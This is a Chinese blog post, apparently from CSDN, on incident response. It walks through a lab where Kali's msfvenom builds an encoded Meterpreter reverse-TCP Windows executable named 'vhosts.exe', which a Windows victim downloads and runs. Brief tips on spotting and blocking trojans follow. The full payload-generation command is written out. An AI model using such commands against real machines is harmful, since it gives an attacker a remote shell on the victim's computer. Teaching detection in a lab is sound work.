应急响应实战之木马实战

一.应急响应流程回顾

二.木马攻击模拟实验

(特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.)

1.环境介绍

攻击机

kali:192.168.1.109

下载地址

被攻击机(注意关闭防火墙)

win10:

下载地址:192.168.1.102

1。模拟攻击情况

msfvenom生成木马

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/vhosts.exe
​

配置好攻击载荷,攻击机ip,端口

进入win7模拟被攻击机网上无意中下载到木马

进入192.168.1.109/vhosts.exe下载木马程序

点击运行

此时攻击机成功建立起链接

后续操作可参考

网络安全之Meterploit的后渗透命令_渗透者:'的博客-CSDN博客

2.windows木马排除:

1.可能通过网络连接观察异常的端口或者IP通信

2.可以通过任务管理器,查看详细信息,找到异常文件

3.通过网络连接,详细信息找到异常进程文件,并使用杀毒软件检测

防御:

1.开启windows防火墙

2.安装正版杀毒软件

(注:仅限于于学习,不得用于非法活动)

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透者:'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值